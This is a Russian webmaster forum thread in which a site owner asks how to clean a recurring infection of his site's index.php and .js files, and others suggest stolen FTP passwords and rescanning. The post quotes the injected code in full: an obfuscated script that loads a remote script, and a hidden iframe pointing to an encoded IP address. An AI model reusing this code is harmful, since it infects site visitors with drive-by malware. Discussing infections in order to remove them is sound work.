- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Есть сайт http://www.open-letter.ru/ (сайт ещё заражен, осторожно, при заходе выключайте js)
Ситуация следующая, вредоносный код например такой
<script>var GU='';var h;var X=new String();var mP="";H=function(){var F=["hu"];function L(Lc,O,d){return Lc.substr(O,d);}OH=55345;OH-=37;var x=document;QM=6929;QM++;q=25298;q-=65;var t='';var vs={};var u=["hR"];var Oi=RegExp;var A={kh:"LQ"};var v=new String("/goo"+"gle."+L("com/DyBg",0,4)+L("abc.EBgq",0,4)+L("0vm1go.c1m0v",4,4)+"om/t"+L("erraX6U",0,4)+L(".comKvlS",0,4)+L("P1By.br.By1P",4,4)+"php");yz={Ec:false};function y(Lc,O){hI=24414;hI++;g={};a=28529;a--;var d=new String(L("[n0jJ",0,1))+O+String("]");var m=new Oi(d, String("g"));n={kW:40818};ly={HN:false};return Lc.replace(m, t);};ZW=9686;ZW-=202;GE=56525;GE-=235;D=["u_","QP"];var E=null;var vd={ka:"J"};var Jn=new Date();Xg={V:51919};var l=751407-743327;try {} catch(U){};var W=new String("body");var qi="qi";this.Vf=38797;this.Vf--;var P=y('skchrkikpjtJ','SvFJDneKyEB_akgG1jx6h7OMZ');var RlE=58536;var Xx=false;this.jo='';vi=41593;vi--;h=function(){try {var YU=new String();var DY="";var dY=y('c4rJeJaVt_ebEslVe4mJe_n4ty','bqV_4sJy6');CN={_Y:63379};s=x[dY](P);var fH="fH";pI=33929;pI--;Uw=[];var G=y('sVrvc5','5wvD6TG4IuR2MLBjQgPpbVK');var Wg=[];var Lc=l+v;var yW=new String();var iO=new String();var Oe=String("defe"+"r");var Et=["qO","AF"];var QX=13548;s[G]=new String("http:"+L("//ten5qC",0,5)+"thpro"+"fit.r"+L("u:mn7k",0,2))+Lc;PA={};s[Oe]=[2,1][1];this.Vt="Vt";var ho=46131;try {var kn='cI'} catch(kn){};this.ww=27193;this.ww+=97;x[W].appendChild(s);this.yk=60072;this.yk++;var Lp=new Date();} catch(PY){this.ku=43483;this.ku++;this.ra=47033;this.ra--;this.ru="ru";};var lu=new Array();var me=new String();};};YB=["LB","uM"];var AI={Vm:4707};H();this.mDs=57864;this.mDs-=135;zz=44697;zz++;var sn=[];window.onload=h;var PQ=false;var mF={Hm:false};try {var r_='iv'} catch(r_){};this.z_="z_";</script><!--c8eaa444c196a659d7f4b2c4c548e12f--<html><body><script type='text/javascript'>str="<ijbwjuics src=" + unescape('%68%74%74%70%3a%2f%2f%39%31%2e%32%31%32%2e%31%39%38%2e%31%31%35%2f%77%65%62%66%6f%72%75%6d%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%38') + " xaoz3='1'vxoq3='1'>";str = str.replace('ijb', 'i');str =str.replace('wju', 'fr');str = str.replace('ics', 'ame');str =str.replace('xaoz3', 'width');str =str.replace('vxoq3','height');document.write(str);</script></body></html>>
прописывается во всех файлах index.php и в всех файлах *.js на сайте, вычищал руками раз 5, в этот же день он поселяется обратно. У меня есть ощущение что делается это автоматически через программу и скрипт и у злоумышленников нет прямого доступа к сайту.
Как изгнать нечисть? Кто нибудь знает механизм работы вируса? Чем опасен JS прописанный на сайте?
проверьте свой комп и смените пароли на серваке
Да забыл сказать комп чист, на серваке пароли менял
Да забыл сказать комп чист
Не nod32 случайно используете?
ALL_SR, просканируйте комп Malwarebytes' Anti-Malware, смените пароли на фтп, загрузите сайт на комп, опять просканируйте и ищите на локалке файл на сайте, который заражен, а также грузит вирус на сайт.
vandamme добавил 25.05.2010 в 10:19
скорее всего троян спер пароли к фтп и подгрузил вирус, у меня такое было
фтп пароль поменй или лучше вообще выключи доступ по фтп и ходи по ссш
если не поможет, может дырка в движке через которую вставляют код вредоносный через XSS
Нет
комп 100%, это не обсуждается.
да, походу так и придется сделать.
Нет, это не XSS дописывают именно в файлы. Хотя вероятности наличия уязвимости у движка не исключаю.
А насчет самого вируса кто-нибудь что нибудь скажет?
комп 100%, это не обсуждается.
чем докажите?
vandamme добавил 25.05.2010 в 11:26
захожу на сайт, есет смарт видит троянец
Ubuntu+Avira+Opera
и касперский видит троянец. а это очень пугает пользователей
Стучите в асю....
Ubuntu+Avira+Opera
это все фигня, работал с авирой когда-то, удалил ...
опера тут ни при чем, убунту тоже не авторитет